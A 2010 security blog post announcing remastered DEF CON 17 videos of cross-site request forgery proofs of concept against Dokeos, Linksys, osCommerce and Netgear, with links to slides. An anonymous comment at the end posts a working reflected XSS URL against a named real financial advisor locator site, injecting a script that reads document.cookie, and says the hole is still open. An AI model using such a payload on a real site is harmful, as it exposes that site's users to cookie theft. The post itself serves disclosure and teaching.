Wednesday, January 20, 2010

DEF CON 17 CSRF Videos Remastered

Thanks to Adam Gerstein for reminding me to get off my butt and produce the Def Con 17 CSRF videos in a more streamable format.
Adobe Flash Player required; no, I won't pwn you.
If you'd like to see the whole presentation video, goofy as it may be, it's here.
Be forewarned, it's freaking huge and takes a fat pipe to pull it down in any reasonable amount of time.
The presentation slides are here.

The Dokeos CSRF PoC video is here.

The Linksys CSRF PoC video is here.

The osCommerce CSRF PoC video is here.
Note: Please don't use osCommerce, they still haven't fixed this and probably never will.

BONUS VIDEO (discussed but not shown at Def Con)
The Netgear CRSF PoC video is here (QuickTime and sorta crappy, sorry).

Enjoy.
Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

1 comment:

Anonymous said...

FYI, that rxss is still there on ameriprise's site...

http://locator.ameripriseadvisors.com/?zip=%3C&x=15&y=14&page=results&solc_id=19819&vend_cd=ALA&offer_id=%22%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C/SCRIPT%3E

enjoy

Moving blog to HolisticInfoSec.io

toolsmith and HolisticInfoSec have moved. I've decided to consolidate all content on one platform, namely an R markdown blogdown sit...